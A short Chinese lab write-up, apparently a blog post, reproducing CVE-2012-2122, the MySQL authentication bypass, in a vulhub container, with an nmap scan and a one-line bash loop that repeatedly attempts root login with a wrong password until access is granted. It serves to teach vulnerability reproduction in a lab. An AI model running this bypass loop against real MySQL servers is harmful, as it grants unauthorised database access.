CVE-2012-2122-mysql未授权访问漏洞复现-vulhub

1.原理

参考:CVE-2012-2122 Mysql身份认证漏洞及利用-CSDN博客

简单来说,除了配置上的问题以外,是密码的验证出现了漏洞,导致尝试次数多了之后直接可以登入

使用:kali+vulhub

2.复现

开一下镜像,用的是vulhub,不了解的可以自己搜一下,网上相关安装挺多的

用ifconfig查一下受攻击机的ip地址

址查一下端口,看看是否正常打开了,发现有3306

用主机的nmap试了下扫描,直接扫端口是扫不到的,因为虚拟机开了防火墙,要-Pn,禁掉ping方式才可以扫到

for i in `seq 1 1000`; do mysql -u root --password=bad -h targetip 2>/dev/null; done(前面让你看的自己ip)

最后记得停止使用容器防止后续其他容器的打开

docker ps 展示所有正在使用的容器

docker stop +容器的id 关闭容器

相关推荐
玫幽倩13 小时前
2026盘古石取证决赛(APK取证)
数据库·python·电子取证·aes·隐藏·笔记软件·手机取证
Navicat中国13 小时前
如何在 DBA 团队中管理共享查询库
数据库·dba
兰令水13 小时前
【agent第3篇】agent上下文+面经
java·大数据·数据库
*neverGiveUp*13 小时前
PostgreSql常用SQL大全
数据库·sql·postgresql
流星白龙13 小时前
【MySQL高阶】21.撤销表空间,撤销日志
android·mysql·adb
真实的菜13 小时前
Redis 从入门到精通(三):持久化机制 —— RDB 与 AOF 深度解析
数据库·redis·缓存
We Just Keep growing14 小时前
【MySQL运维篇】——日志、主从复制、分库分表、读写分离
java·运维·数据库·windows·学习·mysql
橙子圆12314 小时前
Redis知识10之缓存
数据库·redis·缓存
每天都要进步哦14 小时前
MySQL快速入门指南:从零基础到基本操作
数据库·mysql·oracle
bjzhang7514 小时前
mysql 常用命令
数据库·mysql